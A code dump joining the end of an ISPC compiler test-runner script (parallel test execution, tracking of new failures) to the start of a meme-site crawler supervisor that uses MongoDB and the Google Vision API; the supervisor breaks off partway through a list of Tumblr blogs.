(options.compiler_exe, gcc_arch, gcc_isa, match, obj_name, exe_name)
if platform.system() == 'Darwin':
cc_cmd += ' -Wl,-no_pie'
if should_fail:
cc_cmd += " -DEXPECT_FAILURE"
if is_nvptx_target:
nvptxcc_exe = "ptxtools/runtest_ptxcc.sh"
nvptxcc_exe_rel = add_prefix(nvptxcc_exe)
cc_cmd = "%s %s -DTEST_SIG=%d -o %s" % \
(nvptxcc_exe_rel, obj_name, match, exe_name)
ispc_cmd = ispc_exe_rel + " --woff %s -o %s -O3 --arch=%s --target=%s" % \
(filename, obj_name, options.arch, options.target)
if (options.target == "knc-generic"):
ispc_cmd = ispc_exe_rel + " --woff %s -o %s --arch=%s --target=%s" % \
(filename, obj_name, options.arch, "generic-16")
elif (options.target == "knl-generic"):
ispc_cmd = ispc_exe_rel + " --woff %s -o %s --arch=%s --target=%s" % \
(filename, obj_name, options.arch, "generic-16")
else:
ispc_cmd = ispc_exe_rel + " --woff %s -o %s --arch=%s --target=%s" % \
(filename, obj_name, options.arch, options.target)
if options.no_opt:
ispc_cmd += " -O0"
if is_generic_target:
ispc_cmd += " --emit-c++ --c++-include-file=%s" % add_prefix(options.include_file)
if is_nvptx_target:
filename4ptx = "/tmp/"+os.path.basename(filename)+".parsed.ispc"
# grep_cmd = "grep -v 'export uniform int width' %s > %s " % \
grep_cmd = "sed 's/export\ uniform\ int\ width/static uniform\ int\ width/g' %s > %s" % \
(filename, filename4ptx)
if options.verbose:
print "Grepping: %s" % grep_cmd
sp = subprocess.Popen(grep_cmd, shell=True)
sp.communicate()
if is_nvptx_nvvm:
ispc_cmd = ispc_exe_rel + " --woff %s -o %s -O3 --emit-llvm --target=%s" % \
(filename4ptx, obj_name, options.target)
else:
ispc_cmd = ispc_exe_rel + " --woff %s -o %s -O3 --emit-asm --target=%s" % \
(filename4ptx, obj_name, options.target)
# compile the ispc code, make the executable, and run it...
ispc_cmd += " -h " + filename + ".h"
cc_cmd += " -DTEST_HEADER=<" + filename + ".h>"
(compile_error, run_error) = run_cmds([ispc_cmd, cc_cmd],
options.wrapexe + " " + exe_name, \
testname, should_fail)
# clean up after running the test
try:
os.unlink(filename + ".h")
if not options.save_bin:
if not run_error:
os.unlink(exe_name)
if is_windows:
basename = os.path.basename(filename)
os.unlink("%s.pdb" % basename)
os.unlink("%s.ilk" % basename)
os.unlink(obj_name)
except:
None
return (compile_error, run_error)
# pull tests to run from the given queue and run them. Multiple copies of
# this function will be running in parallel across all of the CPU cores of
# the system.
def run_tasks_from_queue(queue, queue_ret, queue_error, queue_finish, total_tests_arg, max_test_length_arg, counter, mutex, glob_var):
# This is needed on windows because windows doesn't copy globals from parent process while multiprocessing
global is_windows
is_windows = glob_var[0]
global options
options = glob_var[1]
global s
s = glob_var[2]
global ispc_exe
ispc_exe = glob_var[3]
global is_generic_target
is_generic_target = glob_var[4]
global is_nvptx_target
is_nvptx_target = glob_var[5]
global run_tests_log
run_tests_log = glob_var[6]
if is_windows:
tmpdir = "tmp%d" % os.getpid()
while os.access(tmpdir, os.F_OK):
tmpdir = "%sx" % tmpdir
os.mkdir(tmpdir)
os.chdir(tmpdir)
else:
olddir = ""
# by default, the thread is presumed to fail
queue_error.put('ERROR')
compile_error_files = [ ]
run_succeed_files = [ ]
run_error_files = [ ]
skip_files = [ ]
while True:
if not queue.empty():
filename = queue.get()
if check_test(filename):
try:
(compile_error, run_error) = run_test(filename)
except:
# This is in case the child has unexpectedly died or some other exception happened
# it`s not what we wanted, so we leave ERROR in queue_error
print_debug("ERROR: run_test function raised an exception: %s\n" % (sys.exc_info()[1]), s, run_tests_log)
# minus one thread, minus one STOP
queue_finish.get()
# needed for queue join
queue_finish.task_done()
# exiting the loop, returning from the thread
break
if compile_error == 0 and run_error == 0:
run_succeed_files += [ filename ]
if compile_error != 0:
compile_error_files += [ filename ]
if run_error != 0:
run_error_files += [ filename ]
with mutex:
update_progress(filename, total_tests_arg, counter, max_test_length_arg)
else:
skip_files += [ filename ]
else:
queue_ret.put((compile_error_files, run_error_files, skip_files, run_succeed_files))
if is_windows:
try:
os.remove("test_static.obj")
# vc*.pdb trick is in anticipaton of new versions of VS.
vcpdb = glob.glob("vc*.pdb")[0]
os.remove(vcpdb)
os.chdir("..")
# This will fail if there were failing tests or
# Windows is in bad mood.
os.rmdir(tmpdir)
except:
None
# the next line is crucial for error indication!
# this thread ended correctly, so take ERROR back
queue_error.get()
# minus one thread, minus one STOP
queue_finish.get()
# needed for queue join
queue_finish.task_done()
# exiting the loop, returning from the thread
break
def sigint(signum, frame):
for t in task_threads:
t.terminate()
sys.exit(1)
def file_check(compfails, runfails):
global exit_code
errors = len(compfails) + len(runfails)
new_compfails = []
new_runfails = []
new_passes_compfails = []
new_passes_runfails = []
# Open file fail_db.txt
f = open(test_states, 'r')
f_lines = f.readlines()
f.close()
# Detect OS
if platform.system() == 'Windows' or 'CYGWIN_NT' in platform.system():
OS = "Windows"
else:
if platform.system() == 'Darwin':
OS = "Mac"
else:
OS = "Linux"
# Detect opt_set
if options.no_opt == True:
opt = "-O0"
else:
opt = "-O2"
# Detect LLVM version
temp1 = common.take_lines(ispc_exe + " --version", "first")
llvm_version = temp1[-12:-4]
# Detect compiler version
if is_windows == False:
temp1 = common.take_lines(options.compiler_exe + " --version", "first")
temp2 = re.search("[0-9]*\.[0-9]*\.[0-9]", temp1)
if temp2 == None:
temp3 = re.search("[0-9]*\.[0-9]*", temp1)
else:
temp3 = re.search("[0-9]*\.[0-9]*", temp2.group())
compiler_version = options.compiler_exe + temp3.group()
else:
compiler_version = "cl"
possible_compilers=set()
for x in f_lines:
if x.startswith("."):
possible_compilers.add(x.split(' ')[-3])
if not compiler_version in possible_compilers:
error("\n**********\nWe don't have history of fails for compiler " +
compiler_version +
"\nAll fails will be new!!!\n**********", 2)
new_line = " "+options.arch.rjust(6)+" "+options.target.rjust(14)+" "+OS.rjust(7)+" "+llvm_version+" "+compiler_version.rjust(10)+" "+opt+" *\n"
new_compfails = compfails[:]
new_runfails = runfails[:]
new_f_lines = f_lines[:]
for j in range(0, len(f_lines)):
if (((" "+options.arch+" ") in f_lines[j]) and
((" "+options.target+" ") in f_lines[j]) and
((" "+OS+" ") in f_lines[j]) and
((" "+llvm_version+" ") in f_lines[j]) and
((" "+compiler_version+" ") in f_lines[j]) and
((" "+opt+" ") in f_lines[j])):
if (" compfail " in f_lines[j]):
f = 0
for i in range(0, len(compfails)):
if compfails[i] in f_lines[j]:
new_compfails.remove(compfails[i])
else:
f = f + 1
if f == len(compfails):
temp3 = f_lines[j].split(" ")
new_passes_compfails.append(temp3[0])
if options.update == "FP":
new_f_lines.remove(f_lines[j])
if (" runfail " in f_lines[j]):
f = 0
for i in range(0, len(runfails)):
if runfails[i] in f_lines[j]:
new_runfails.remove(runfails[i])
else:
f = f + 1
if f == len(runfails):
temp3 = f_lines[j].split(" ")
new_passes_runfails.append(temp3[0])
if options.update == "FP":
new_f_lines.remove(f_lines[j])
if len(new_runfails) != 0:
print_debug("NEW RUNFAILS:\n", s, run_tests_log)
exit_code = 1
for i in range (0,len(new_runfails)):
new_f_lines.append(new_runfails[i] + " runfail " + new_line)
print_debug("\t" + new_runfails[i] + "\n", s, run_tests_log)
if len(new_compfails) != 0:
print_debug("NEW COMPFAILS:\n", s, run_tests_log)
exit_code = 1
for i in range (0,len(new_compfails)):
new_f_lines.append(new_compfails[i] + " compfail " + new_line)
print_debug("\t" + new_compfails[i] + "\n", s, run_tests_log)
if len(new_runfails) == 0 and len(new_compfails) == 0:
print_debug("No new fails\n", s, run_tests_log)
if len(new_passes_runfails) != 0:
print_debug("NEW PASSES after RUNFAILS:\n", s, run_tests_log)
for i in range (0,len(new_passes_runfails)):
print_debug("\t" + new_passes_runfails[i] + "\n", s, run_tests_log)
if len(new_passes_compfails) != 0:
print_debug("NEW PASSES after COMPFAILS:\n", s, run_tests_log)
for i in range (0,len(new_passes_compfails)):
print_debug("\t" + new_passes_compfails[i] + "\n", s, run_tests_log)
if options.update != "":
output = open(test_states, 'w')
output.writelines(new_f_lines)
output.close()
return [new_runfails, new_compfails, new_passes_runfails, new_passes_compfails, new_line, errors]
def verify():
# Open file fail_db.txt
f = open(test_states, 'r')
f_lines = f.readlines()
f.close()
check = [["g++", "clang++", "cl"],["-O0", "-O2"],["x86","x86-64"],
["Linux","Windows","Mac"],["LLVM 3.2","LLVM 3.3","LLVM 3.4","LLVM 3.5","LLVM 3.6","LLVM trunk"],
["sse2-i32x4", "sse2-i32x8", "sse4-i32x4", "sse4-i32x8", "sse4-i16x8",
"sse4-i8x16", "avx1-i32x4" "avx1-i32x8", "avx1-i32x16", "avx1-i64x4", "avx1.1-i32x8",
"avx1.1-i32x16", "avx1.1-i64x4", "avx2-i32x8", "avx2-i32x16", "avx2-i64x4",
"generic-1", "generic-4", "generic-8",
"generic-16", "generic-32", "generic-64", "knc-generic", "knl-generic", "avx512knl-i32x16"]]
for i in range (0,len(f_lines)):
if f_lines[i][0] == "%":
continue
for j in range(0,len(check)):
temp = 0
for t in range(0,len(check[j])):
if " " + check[j][t] + " " in f_lines[i]:
temp = temp + 1
if temp != 1:
print_debug("error in line " + str(i) + "\n", False, run_tests_log)
break
def run_tests(options1, args, print_version):
global options
options = options1
global s
s = options.silent
# prepare run_tests_log and fail_db file
global run_tests_log
if options.in_file:
run_tests_log = os.getcwd() + os.sep + options.in_file
if print_version == 1:
common.remove_if_exists(run_tests_log)
else:
run_tests_log = ""
global test_states
test_states = "fail_db.txt"
if options.verify:
verify()
return 0
# disable fancy error/warning printing with ANSI colors, so grepping for error
# messages doesn't get confused
os.environ["TERM"] = "dumb"
# This script is affected by http://bugs.python.org/issue5261 on OSX 10.5 Leopard
# git history has a workaround for that issue.
global is_windows
is_windows = (platform.system() == 'Windows' or
'CYGWIN_NT' in platform.system())
if options.target == 'neon':
options.arch = 'arm'
if options.target == "nvptx":
options.arch = "nvptx64"
global ispc_exe
ispc_exe = ""
ispc_ext=""
if is_windows:
ispc_ext = ".exe"
if os.environ.get("ISPC_HOME") != None:
if os.path.exists(os.environ["ISPC_HOME"] + os.sep + "ispc" + ispc_ext):
ispc_exe = os.environ["ISPC_HOME"] + os.sep + "ispc" + ispc_ext
PATH_dir = string.split(os.getenv("PATH"), os.pathsep)
for counter in PATH_dir:
if ispc_exe == "":
if os.path.exists(counter + os.sep + "ispc" + ispc_ext):
ispc_exe = counter + os.sep + "ispc" + ispc_ext
# checks the required ispc compiler otherwise prints an error message
if ispc_exe == "":
error("ISPC compiler not found.\nAdded path to ispc compiler to your PATH variable or ISPC_HOME variable\n", 1)
print_debug("Testing ispc: " + ispc_exe + "\n", s, run_tests_log)
# On Windows use relative path to not depend on host directory, which may possibly
# have white spaces and unicode characters.
if is_windows:
common_prefix = os.path.commonprefix([ispc_exe, os.getcwd()])
ispc_exe = os.path.relpath(ispc_exe, os.getcwd())
ispc_exe += " " + options.ispc_flags
global is_generic_target
is_generic_target = ((options.target.find("generic-") != -1 and
options.target != "generic-1" and options.target != "generic-x1") or
options.target == "knc-generic" or options.target == "knl-generic")
global is_nvptx_target
is_nvptx_target = (options.target.find("nvptx") != -1)
if is_generic_target and options.include_file == None:
if options.target == "generic-4" or options.target == "generic-x4":
error("No generics #include specified; using examples/intrinsics/sse4.h\n", 2)
options.include_file = "examples/intrinsics/sse4.h"
options.target = "generic-4"
elif options.target == "generic-8" or options.target == "generic-x8":
error("No generics #include specified and no default available for \"generic-8\" target.\n", 1)
options.target = "generic-8"
elif options.target == "generic-16" or options.target == "generic-x16":
error("No generics #include specified; using examples/intrinsics/generic-16.h\n", 2)
options.include_file = "examples/intrinsics/generic-16.h"
options.target = "generic-16"
elif options.target == "generic-32" or options.target == "generic-x32":
error("No generics #include specified; using examples/intrinsics/generic-32.h\n", 2)
options.include_file = "examples/intrinsics/generic-32.h"
options.target = "generic-32"
elif options.target == "generic-64" or options.target == "generic-x64":
error("No generics #include specified; using examples/intrinsics/generic-64.h\n", 2)
options.include_file = "examples/intrinsics/generic-64.h"
options.target = "generic-64"
elif options.target == "knc-generic":
error("No knc #include specified; using examples/intrinsics/knc.h\n", 2)
options.include_file = "examples/intrinsics/knc.h"
elif options.target == "knl-generic":
error("No knl #include specified; using examples/intrinsics/knl.h\n", 2)
options.include_file = "examples/intrinsics/knl.h"
if options.compiler_exe == None:
if (options.target == "knc-generic"):
options.compiler_exe = "icpc"
elif (options.target == "knl-generic"):
options.compiler_exe = "icpc"
elif is_windows:
options.compiler_exe = "cl.exe"
else:
options.compiler_exe = "clang++"
# checks the required compiler otherwise prints an error message
PATH_dir = string.split(os.getenv("PATH"), os.pathsep)
compiler_exists = False
for counter in PATH_dir:
if os.path.exists(counter + os.sep + options.compiler_exe):
compiler_exists = True
break
if not compiler_exists:
error("missing the required compiler: %s \n" % options.compiler_exe, 1)
# print compilers versions
if print_version > 0:
common.print_version(ispc_exe, "", options.compiler_exe, False, run_tests_log, is_windows)
ispc_root = "."
# checks the required environment otherwise prints an error message
if (options.target == "knc-generic"):
options.wrapexe = "micnativeloadex"
PATH_dir = string.split(os.getenv("PATH"), os.pathsep)
wrapexe_exists = False
for counter in PATH_dir:
if os.path.exists(counter + os.sep + options.wrapexe):
wrapexe_exists = True
break
if not wrapexe_exists:
error("missing the required launcher: %s \nAdd it to your $PATH\n" % options.wrapexe, 1)
if platform.system() == 'Windows' or 'CYGWIN_NT' in platform.system():
OS = "Windows"
else:
if platform.system() == 'Darwin':
OS = "Mac"
else:
OS = "Linux"
if not (OS == 'Linux'):
error ("knc-generic target is supported only on Linux", 1)
# if no specific test files are specified, run all of the tests in tests/,
# failing_tests/, and tests_errors/
if len(args) == 0:
files = glob.glob(ispc_root + os.sep + "tests" + os.sep + "*ispc") + \
glob.glob(ispc_root + os.sep + "tests_errors" + os.sep + "*ispc")
else:
if is_windows:
argfiles = [ ]
for f in args:
# we have to glob ourselves if this is being run under a DOS
# shell, as it passes wildcard as is.
argfiles += glob.glob(f)
else:
argfiles = args
files = [ ]
for f in argfiles:
if os.path.splitext(string.lower(f))[1] != ".ispc":
error("Ignoring file %s, which doesn't have an .ispc extension.\n" % f, 2)
else:
files += [ f ]
# max_test_length is used to issue exact number of whitespace characters when
# updating status. Otherwise update causes new lines standard 80 char terminal
# on both Linux and Windows.
max_test_length = 0
for f in files:
max_test_length = max(max_test_length, len(f))
# randomly shuffle the tests if asked to do so
if (options.random):
random.seed()
random.shuffle(files)
# counter
total_tests = len(files)
compile_error_files = [ ]
run_succeed_files = [ ]
run_error_files = [ ]
skip_files = [ ]
nthreads = min(multiprocessing.cpu_count(), options.num_jobs)
nthreads = min(nthreads, len(files))
print_debug("Running %d jobs in parallel. Running %d tests.\n" % (nthreads, total_tests), s, run_tests_log)
# put each of the test filenames into a queue
q = multiprocessing.Queue()
for fn in files:
q.put(fn)
# qret is a queue for returned data
qret = multiprocessing.Queue()
# qerr is an error indication queue
qerr = multiprocessing.Queue()
# qfin is a waiting queue: JoinableQueue has join() and task_done() methods
qfin = multiprocessing.JoinableQueue()
# for each thread, there is a STOP in qfin to synchronize execution
for x in range(nthreads):
qfin.put('STOP')
# need to catch sigint so that we can terminate all of the tasks if
# we're interrupted
signal.signal(signal.SIGINT, sigint)
finished_tests_counter = multiprocessing.Value(c_int)
finished_tests_counter_lock = multiprocessing.Lock()
start_time = time.time()
# launch jobs to run tests
glob_var = [is_windows, options, s, ispc_exe, is_generic_target, is_nvptx_target, run_tests_log]
global task_threads
task_threads = [0] * nthreads
for x in range(nthreads):
task_threads[x] = multiprocessing.Process(target=run_tasks_from_queue, args=(q, qret, qerr, qfin, total_tests,
max_test_length, finished_tests_counter, finished_tests_counter_lock, glob_var))
task_threads[x].start()
# wait for them all to finish and rid the queue of STOPs
# join() here just waits for synchronization
qfin.join()
if options.non_interactive == False:
print_debug("\n", s, run_tests_log)
temp_time = (time.time() - start_time)
elapsed_time = time.strftime('%Hh%Mm%Ssec.', time.gmtime(temp_time))
while not qret.empty():
(c, r, skip, ss) = qret.get()
compile_error_files += c
run_error_files += r
skip_files += skip
run_succeed_files += ss
# Detect opt_set
if options.no_opt == True:
opt = "-O0"
else:
opt = "-O2"
try:
common.ex_state.add_to_rinf_testall(total_tests)
for fname in skip_files:
# We do not add skipped tests to test table as we do not know the test result
common.ex_state.add_to_rinf(options.arch, opt, options.target, 0, 0, 0, 1)
for fname in compile_error_files:
common.ex_state.add_to_tt(fname, options.arch, opt, options.target, 0, 1)
common.ex_state.add_to_rinf(options.arch, opt, options.target, 0, 0, 1, 0)
for fname in run_error_files:
common.ex_state.add_to_tt(fname, options.arch, opt, options.target, 1, 0)
common.ex_state.add_to_rinf(options.arch, opt, options.target, 0, 1, 0, 0)
for fname in run_succeed_files:
common.ex_state.add_to_tt(fname, options.arch, opt, options.target, 0, 0)
common.ex_state.add_to_rinf(options.arch, opt, options.target, 1, 0, 0, 0)
except:
print_debug("Exception in ex_state. Skipping...", s, run_tests_log)
# if all threads ended correctly, qerr is empty
if not qerr.empty():
raise OSError(2, 'Some test subprocess has thrown an exception', '')
if options.non_interactive:
print_debug(" Done %d / %d\n" % (finished_tests_counter.value, total_tests), s, run_tests_log)
if len(skip_files) > 0:
skip_files.sort()
print_debug("%d / %d tests SKIPPED:\n" % (len(skip_files), total_tests), s, run_tests_log)
for f in skip_files:
print_debug("\t%s\n" % f, s, run_tests_log)
if len(compile_error_files) > 0:
compile_error_files.sort()
print_debug("%d / %d tests FAILED compilation:\n" % (len(compile_error_files), total_tests), s, run_tests_log)
for f in compile_error_files:
print_debug("\t%s\n" % f, s, run_tests_log)
if len(run_error_files) > 0:
run_error_files.sort()
print_debug("%d / %d tests FAILED execution:\n" % (len(run_error_files), total_tests), s, run_tests_log)
for f in run_error_files:
print_debug("\t%s\n" % f, s, run_tests_log)
if len(compile_error_files) == 0 and len(run_error_files) == 0:
print_debug("No fails\n", s, run_tests_log)
if len(args) == 0:
R = file_check(compile_error_files, run_error_files)
else:
error("don't check new fails for incomplete suite of tests", 2)
R = 0
if options.time:
print_debug("Elapsed time: " + elapsed_time + "\n", s, run_tests_log)
return [R, elapsed_time]
from optparse import OptionParser
import multiprocessing
from ctypes import c_int
import os
import sys
import glob
import re
import signal
import random
import string
import threading
import subprocess
import shlex
import platform
import tempfile
import os.path
import time
# our functions
import common
print_debug = common.print_debug
error = common.error
exit_code = 0
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-r", "--random-shuffle", dest="random", help="Randomly order tests",
default=False, action="store_true")
parser.add_option("-g", "--generics-include", dest="include_file", help="Filename for header implementing functions for generics",
default=None)
parser.add_option("-f", "--ispc-flags", dest="ispc_flags", help="Additional flags for ispc (-g, -O1, ...)",
default="")
parser.add_option('-t', '--target', dest='target',
help=('Set compilation target (sse2-i32x4, sse2-i32x8, sse4-i32x4, sse4-i32x8, ' +
'sse4-i16x8, sse4-i8x16, avx1-i32x8, avx1-i32x16, avx1.1-i32x8, avx1.1-i32x16, ' +
'avx2-i32x8, avx2-i32x16, avx512knl-i32x16, generic-x1, generic-x4, generic-x8, generic-x16, ' +
'generic-x32, generic-x64, knc-generic, knl-generic)'), default="sse4")
parser.add_option('-a', '--arch', dest='arch',
help='Set architecture (arm, x86, x86-64)',default="x86-64")
parser.add_option("-c", "--compiler", dest="compiler_exe", help="C/C++ compiler binary to use to run tests",
default=None)
parser.add_option('-o', '--no-opt', dest='no_opt', help='Disable optimization',
default=False, action="store_true")
parser.add_option('-j', '--jobs', dest='num_jobs', help='Maximum number of jobs to run in parallel',
default="1024", type="int")
parser.add_option('-v', '--verbose', dest='verbose', help='Enable verbose output',
default=False, action="store_true")
parser.add_option('--wrap-exe', dest='wrapexe',
help='Executable to wrap test runs with (e.g. "valgrind" or "sde -knl -- ")',
default="")
parser.add_option('--time', dest='time', help='Enable time output',
default=False, action="store_true")
parser.add_option('--non-interactive', dest='non_interactive', help='Disable interactive status updates',
default=False, action="store_true")
parser.add_option('-u', "--update-errors", dest='update', help='Update file with fails (F of FP)', default="")
parser.add_option('-s', "--silent", dest='silent', help='enable silent mode without any output', default=False,
action = "store_true")
parser.add_option("--file", dest='in_file', help='file to save run_tests output', default="")
parser.add_option("--verify", dest='verify', help='verify the file fail_db.txt', default=False, action="store_true")
parser.add_option("--save-bin", dest='save_bin', help='compile and create bin, but don\'t execute it',
default=False, action="store_true")
(options, args) = parser.parse_args()
L = run_tests(options, args, 1)
exit(exit_code)
|
supervisor.py
|
import os
import signal
import threading
from Queue import Queue
from urlparse import urlparse
import requests
from google.cloud import vision
from pymongo import MongoClient
from crawlers.buzzfeed import BuzzFeedCrawler
from crawlers.cheez_burger import CheezBurgerCrawler
from crawlers.dopl3r import Dopl3rCrawler
from crawlers.dump_a_day import DumpADayCrawler
from crawlers.funny_memes import FunnyMemesCrawler
from crawlers.funnyjunk import FunnyJunkCrawler
from crawlers.ifunny import IfunnyCrawler
from crawlers.imgflip import ImgFlipCrawler
from crawlers.imgur import ImgurCrawler
from crawlers.instagram import InstagramCrawler
from crawlers.ladnow import LadnowCrawler
from crawlers.le_funny import LeFunnyCrawler
from crawlers.me_me import MeMeCrawler
from crawlers.meme_generator import MemeGeneratorCrawler
from crawlers.meme_guy import MemeGuyCrawler
from crawlers.meme_xyz import MemeXYZCrawler
from crawlers.memedroid import MemedroidCrawler
from crawlers.nine_gag import NineGagCrawler
from crawlers.on_sizzle import OnSizzleCrawler
from crawlers.pinterest_crawler import PinterestCrawler
from crawlers.quora_treasury import QuoraTreasuryCrawler
from crawlers.reddit import RedditCrawler, r_get_submission_comments
from crawlers.ruin_my_week import RuinMyWeekCrawler
from crawlers.the_chive import TheChiveCrawler
from crawlers.the_funny_beaver import TheFunnyBeaverCrawler
from crawlers.the_humor_train import TheHumorTrainCrawler
from crawlers.troll_street import TrollStreetCrawler
from crawlers.tumblr import TumblrCrawler
from crawlers.vifunow import VifunowCrawler
from crawlers.dank_meme_team import DankMemeTeamCrawler
from crawlers.funny_photo import FunnyPhotoCrawler
from crawlers.img_lulz import ImgLulzCrawler
from crawlers.huge_lol import HugeLolCrawler
from crawlers.daily_pic_dump import DailyPicDumpCrawler
from crawlers.call_center_memes import CallCenterMemesCrawler
from crawlers.pr0gramm import Pr0grammCrawler
from crawlers.trend_uso import TrendUSOMemesCrawler
from crawlers.best_funny_pic import BestFunnyPicCrawler
from crawlers.joy_reactor import JoyReactorCrawler
from crawlers.beer_money_pizza import BeerMoneyPizzaCrawler
from crawlers.hidden_lol import HiddenLolCrawler
from crawlers.fun_substance import FreshSubstanceCrawler
from crawlers.nine_buzz import NineBuzzCrawler
from crawlers.the_meta_picture import TheMetaPictureCrawler
from crawlers.daily_haha import DailyHahaCrawler
from crawlers.dev_humor import DevHumorCrawler
from crawlers.iwsmt import IWSMTCrawler
from crawlers.four_pm_happy_hour import FourPMHappyHourCrawler
from crawlers.kontraband import KontrabandCrawler
from crawlers.still_cracking import StillCrackingCrawler
from crawlers.meme_collection import MemeCollectionCrawler
from crawlers.slow_robot import SlowRobotCrawler
from crawlers.wanna_joke import WannaJokeCrawler
from crawlers.some_ecards import SomeEcardsCrawler
from crawlers.laugh_tard import LaughTardCrawler
from crawlers.humour_spot import HumourSpotCrawler
from crawlers.put_me_like import PutMeLikeCrawler
from crawlers.spastic_bastard import SpasticBastardCrawler
from crawlers.saying_images import SayingImagesCrawler
from crawlers.fun_pic import FunPicCrawler
from crawlers.barnorama import BarnoramaCrawler
from crawlers.fun_mary import FunMaryCrawler
from crawlers.gorilla_feed import GorillaFeedCrawler
from crawlers.one_jux import OneJuxCrawler
from crawlers.odd_stuff_magazine import OddStuffMagazineCrawler
from crawlers.love_for_quotes import LoveForQuotesCrawler
from crawlers.bored_panda import BoredPandaCrawler
from crawlers.ebaums_world import EbaumsWorldCrawler
from crawlers.thunder_dungeon import ThunderDungeonCrawler
from crawlers.zodab import ZodabCrawler
from crawlers.funny_captions import FunnyCaptionsCrawler
from crawlers.fame_pace import FamePaceCrawler
from crawlers.funny_memes_4u import FunnyMemes4UCrawler
from crawlers.epic_pix import EpicPixCrawler
from crawlers.lol_damn import LolDamnCrawler
from crawlers.uber_humor import UberHumorCrawler
from crawlers.just_viral import JustViralCrawler
from crawlers.acid_cow import AcidCowCrawler
from crawlers.facebook_crawler import FacebookCrawler
from crawlers.four_chan import FourChanCrawler
from crawlers.clean_memes import CleanMemesCrawler
from crawlers.the_last_thing_99 import TheLastThingCrawler
from crawlers.astrology_memes import AstrologyMemesCrawler
from crawlers.thuglife_meme import ThugLifeMemeCrawler
from crawlers.izismile import IzismileCrawler
from crawlers.quotes_n_humor import QuotesNHumorCrawler
from crawlers.screen_eggs import ScreenEggsCrawler
from crawlers.twitter_crawler import TwitterCrawler
# from crawlers.evil_milk import EvilMilkCrawler
from settings import EXCLUDED_TLDS, CRAWL_DAYS_BACK, DATA_ROOT_PATH, BEGIN_CRAWL_SINCE, \
MONGODB_NAME
from utils import sha256_checksum, annotate_text, annotate_web
google_client = vision.ImageAnnotatorClient()
mongo_client = MongoClient()
db = mongo_client[MONGODB_NAME]
posts = db.posts
instagram = db.instagram
instagram_nodes = db.instagram_nodes
nine_gag = db.nine_gag
reddit = db.reddit
imgur = db.imgur
imgflip = db.imgflip
funny_junk = db.funny_junk
on_sizzle = db.on_sizzle
routes = db.routes
images = db.images
sources = db.sources
facebook_pages = db.facebook
twitter_accounts = db.twitter
google_queue = Queue()
CRAWLER_THREADS = {}
def get_http_headers(url):
response = requests.get(url)
if response.status_code == 404:
return None
return response.headers
ig_accounts = sorted([r.lower() for r in sources.find_one({"name": "instagram"})['children']])
four_chan_boards = ['b', 'pol']
sub_reddit_accounts = [r.lower() for r in sources.find_one({"name": "reddit"})['children']]
facebook_pages_list = [p for p in facebook_pages.find({"posts": {"$exists": True}, "deleted": {"$exists": False},
"latest_post_time": {"$gte": "2019-01-01T08:00:20+0000"}}).sort(
"last_crawled", 1)]
twitter_accounts_list = [p for p in twitter_accounts.find({"deleted": {"$exists": False}}).sort("last_crawled", 1)]
for i in ig_accounts:
if not os.path.exists("{}/data/instagram/{}".format(DATA_ROOT_PATH, i)):
os.mkdir("{}/data/instagram/{}".format(DATA_ROOT_PATH, i))
for p in facebook_pages_list:
if not os.path.exists("{}/data/facebook/{}".format(DATA_ROOT_PATH, p['id'])):
os.mkdir("{}/data/facebook/{}".format(DATA_ROOT_PATH, p['id']))
for p in twitter_accounts_list:
if not os.path.exists("{}/data/twitter/{}".format(DATA_ROOT_PATH, p['screen_name'])):
os.mkdir("{}/data/twitter/{}".format(DATA_ROOT_PATH, p['screen_name']))
for b in four_chan_boards:
if not os.path.exists("{}/data/four_chan/{}".format(DATA_ROOT_PATH, b)):
os.mkdir("{}/data/four_chan/{}".format(DATA_ROOT_PATH, b))
def get_text_regions(filename):
annotations = annotate_text(google_client, filename)
text_regions = []
for a in annotations:
t = {'description': a.description, 'locale': a.locale}
poly = []
for v in a.bounding_poly.vertices:
poly.append({"x": v.x, "y": v.y})
t['bounding_poly'] = poly
text_regions.append(t)
return text_regions
def get_web_detection(filename):
annotations = annotate_web(google_client, filename)
full_matching_images = []
pages_with_matching_images = []
if annotations.full_matching_images:
for a in annotations.full_matching_images:
full_matching_images.append({"url": a.url, "score": a.score})
if annotations.pages_with_matching_images:
for a in annotations.pages_with_matching_images:
pages_with_matching_images.append(
{"url": a.url, "page_tile": a.page_title})
return full_matching_images, pages_with_matching_images
def _vision_thread():
while True:
img = google_queue.get()
if img is None:
break
img_obj = images.find_one({"_id": img["_id"]})
file_name = os.path.join(DATA_ROOT_PATH, img_obj['file_name'])
try:
file_stat = os.stat(file_name)
if file_stat.st_size > 10485759:
continue
if img_obj[
'created_at'] < BEGIN_CRAWL_SINCE: # (int(time.time()) - timedelta(days=CRAWL_DAYS_BACK).total_seconds()):
continue
if 'text_regions' in img_obj:
print("Skipping {}".format(file_name))
continue
if os.path.exists(file_name):
print("Text for {}".format(file_name))
print('-' * 64)
try:
img_obj['text_regions'] = get_text_regions(file_name)
img_obj['full_matching_images'], img_obj['pages_with_matching_images'] = get_web_detection(
file_name)
if len(img_obj['text_regions']):
img_obj["text"] = img_obj['text_regions'][0]['description']
img_obj['google_query_completed'] = True
except Exception as ex:
print(ex)
print('[ERROR]: {}'.format(file_name))
else:
print("{} not found".format(file_name))
images.update_one({'_id': img_obj['_id']}, {"$set": img_obj}, upsert=False)
print('-' * 82)
except Exception as ex:
print(ex)
print("[{}] failed ...///{}".format(img_obj['source'], file_name))
def signal_handler(signum, frame):
if signum in [signal.SIGINT]:
sources.update_many({"is_verified": True}, {"$set": {"is_running": False}}, upsert=False)
print("[supervisor.py] Stop signal received, waiting for children to terminate")
exit(0)
tumblr_blogs = [
u'paxamericana.tumblr.com', u'cartoon-dog.tumblr.com',
u'dragondicks.tumblr.com', u'terriamon.tumblr.com',
u'thisiselliz.tumblr.com', u'wonder-mechanic.tumblr.com',
'buzzfeed.tumblr.com', u'memearchives.tumblr.com', 'tomche.tumblr.com',
'h-i-l-a-r-i-o-u-s.tumblr.com', 'funnygamememes.tumblr.com', 'omg-humor.com', 'srsfunny.net',
'memes.tumblr.com', 'killowave-the-2nd.tumblr.com', 'memes--memes.tumblr.com', 'hedankest.tumblr.com',
'the-memedaddy.tumblr.com', 'dankmemesreasonforliving.tumblr.com', 'lolwtfmemes.tumblr.com',
'knowwhatime.me', 'thatgirlwiththememes.tumblr.com', 'kpop-memess.tumblr.com', 'fakehistory.tumblr.com',
'funny.directory', 'edgy-memes-for-woke-teens.tumblr.com', 'universeofmemes.tumblr.com',
'unpredictablememes.tumblr.com', '30-minute-memes.tumblr.com', 'memecollege.tumblr.com',
